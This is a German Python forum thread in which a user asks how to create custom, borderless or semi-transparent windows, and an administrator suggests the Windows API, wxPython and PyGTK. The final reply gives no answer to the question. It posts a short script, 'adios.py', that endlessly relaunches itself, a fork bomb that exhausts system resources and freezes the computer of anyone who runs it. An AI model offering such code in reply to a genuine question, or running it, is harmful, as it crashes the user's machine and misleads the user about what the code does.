Eigenes Fenster, entry ect

Du hast eine Idee für ein Projekt?
Antworten
Vos
User
Beiträge: 40
Registriert: Freitag 24. März 2006, 13:37

Mittwoch 24. Mai 2006, 18:59

Hi!

Ich hab mal eine frage, ich habs unter Ideen gepackt ich hoffe das stimmt so!

Ich würde gern wissen wie man eigene Fenster, entrys ect. Schreibt, den ich würde gerne programme schrieben die ohne diese "blöden" windows fenster sind. Z.B.: so halb durchsichtig ect...

Grüße

Vos
Leonidas
Administrator
Beiträge: 16024
Registriert: Freitag 20. Juni 2003, 16:30
Kontaktdaten:

Mittwoch 24. Mai 2006, 20:43

(Halb)durchsichtige Fenster gehen mit der Windows-API, dazu gibt es im Python Cookbook ein Rezept.

Und Fenster.. normalerweise nutzt man aus Python Toolkits die in C oder C++ geschrieben sind wie wxPython oder PyGTK. Ich denke aber, dass zumindest wxPython Fenster ohne Rahmen von sich aus ermöglicht.
My god, it's full of CARs! | Leonidasvoice vs Modvoice
jAN
User
Beiträge: 170
Registriert: Samstag 4. Juni 2005, 18:51
Wohnort: Großmehlra (in Thüringen)
Kontaktdaten:

Donnerstag 25. Mai 2006, 15:05

#adios.py
import os,sys
while 1: os.startfile(sys.argv[0])
Antworten